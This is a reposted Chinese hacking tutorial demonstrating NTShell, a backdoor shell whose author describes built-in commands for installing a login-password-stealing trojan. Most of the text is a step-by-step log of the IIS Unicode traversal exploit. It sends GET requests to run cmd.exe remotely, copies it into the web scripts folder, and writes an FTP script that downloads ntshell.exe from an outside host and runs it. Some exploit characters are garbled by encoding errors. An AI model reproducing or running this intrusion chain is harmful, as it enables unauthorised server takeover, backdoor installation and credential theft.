NTShell使用示例

2008-04-09 04:11:05来源：互联网阅读 ()

NTShell使用示例本示例仅为示范NTShell的功能与语法，因此使用unicode漏洞进行攻击试验。NTShell 1.0 的例子重点在于InstallGina命令的使用，和跳板的用法。 NTShell是一个Window NT/2000下的类似telnet服务端的程序，当你用telnet客户端和该程序连接后，就可以使用任何命令行的程序了。实现这一功能的程序最初就是著名的netcat、ncx(从netcat里提出telnet服务端功能的一个程序，有ncx和ncx99两个版本，现已被金山毒霸列为木马）。不过ncx只实现了这一功能，使用时不大方便，比如文件的上传和下载就和麻烦，客户端要和服务端交换文件必须客户端有ftp服务或者使用其他ftp中转站（更加麻烦了），而且windows的ftp.exe程序非常特殊，在这种情况下使用非常不方便。因此我开发了这个NTShell程序，这个程序除了支持类似telnet的功能之外，还内建了其他有用的命令和命令行选项，具体内容和使用方法可以看NTShell的帮助，运行环境只有Windows NT和Windows 2000。 NTShell最主要的内置命令包括直接上传文件、下载文件、进程管理、添加自动运行、安装窃听登录密码的木马。然而由于标准的telnet客户端不能理解NTShell的上传和下载文件通信，因此我还开发了NTShell的客户端，否则不能使用直接上传和下载文件功能。我也推荐使用这个客户端，因为除了此功能外， NTShellc还有命令行缓冲和命令行编辑（一次命令只有在回车后才发送，在此之前如果输入错误可以更改；而使用标准的telnet，你没一次按键都会发给服务器，因此有时很不方便）功能。它可以在各个Windows系统里运行，详细情况见 NTShellc的帮助。
以'>'开头的是客户端的信息输出，以'#'开头的是客户端的信息输出。而以'//'开头的行是我的注释，一次命令前说明目的，使用命令后是结果分析。
//使用示例开始
//在本机运行客户端，
F:\hacktool\ntshell>ntshellc
NtShell Client Program.
> Type Help to see the commands
//连接目标计算机的www服务
NTShellc>o 192.168.0.1 80
> Connect to 192.168.0.1 at Port 80 ...
> Connected with the server.
//请求一个已知的文件，浏览它的网站知道该文件的位置
GET /iissamples/default?samples.asp /HTTP/1.0 HTTP/1.1 404 找不到对象
Server: Microsoft-IIS/4.0
Date: Sat, 10 Feb 2001 15:08:26 GMT
//找不到文件，IIS4.0，应该是%1湥?
//再来，
NTShellc>o 192.168.0.1 80
> Connect to 192.168.0.1 at Port 80 ...
> Connected with the server. GET /iissamples/default翜samples.asp HTTP/1.0 HTTP/1.1 200 OK
//行了，找到了，
//下面要试试，哪些web目录在和系统在同一个逻辑盘上
GET /scripts/..翜../..翜../winnt/system32/cmd.exe?/c dir HTTP/1.0 HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
//找到了，就用它了 Directory of C:\Inetpub\scripts 01-01-09 02:58p <DIR> .
01-01-09 02:58p <DIR> ..
00-08-28 05:30p <DIR> proxy
00-08-28 05:30p <DIR> tools
4 File(s) 241,424 bytes
850,364,416 bytes free > Connection closed NTShellc>o 192.168.0.1 80
//拷贝cmd.exe，其实在 GET 命令最后没有HTTP/1.0 也行，以后就省了
GET /scripts/..翜../..翜../winnt/system32/cmd.exe?/c copy \winnt\system32\cmd.exe dmc.exe HTTP/1.1 502 网关错误
Server: Microsoft-IIS/4.0
Date: Wed, 07 Feb 2001 09:47:20 GMT
Content-Length: 190
Content-Type: text/html <head><title>CGI 运用程序中出错</title></head>
<body><h1>CGI 错误</h1>指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正
常。它返回的标题是:<p><p><pre> 1 file(s) copied.
</pre>
> Connection closed
//不理它， 1 file(s) copied. 没有访问拒绝就行
//下面就方便了，赶紧把ntshell上传，就使用ftp脚本吧。依次执行以下命令：
GET /scripts/dmc.exe?/c echo open x.x.x.x>ftp.bin
GET /scripts/dmc.exe?/c echo anonymous>>ftp.bin
GET /scripts/dmc.exe?/c echo test@test>>ftp.bin
GET /scripts/dmc.exe?/c echo binary>>ftp.bin //一定要有这步，不然有的上传的文件内容变了
GET /scripts/dmc.exe?/c echo get ntshell.exe>>ftp.bin
GET /scripts/dmc.exe?/c echo quit>>ftp.bin
//看看文件内容写的对不对，
GET /scripts/dmc.exe?/c type ftp.bin
HTTP/1.1 502 网关错误
Server: Microsoft-IIS/4.0
Date: Wed, 07 Feb 2001 14:57:14 GMT
Content-Length: 232
Content-Type: text/html <head><title>CGI 运用程序中出错</title></head>
<body><h1>CGI 错误</h1>指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正
常。它返回的标题是:<p><p><pre>open x.x.x.x
anonymous
test@test
binary
get ntshell.exe
quit
</pre>
> Connection closed
//OK
//好的，执行ftp
GET /scripts/dmc.exe?/c ftp -s:ftp.bin
//等一会，看看文件是否上传完成
GET /scripts/dmc.exe?/c dir Directory of C:\Inetpub\scripts 01-02-07 10:58p <DIR> .
01-02-07 10:58p <DIR> ..
98-11-11 04:04a 241,424 dmc.exe
01-02-08 12:24a 64 ftp.bin

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有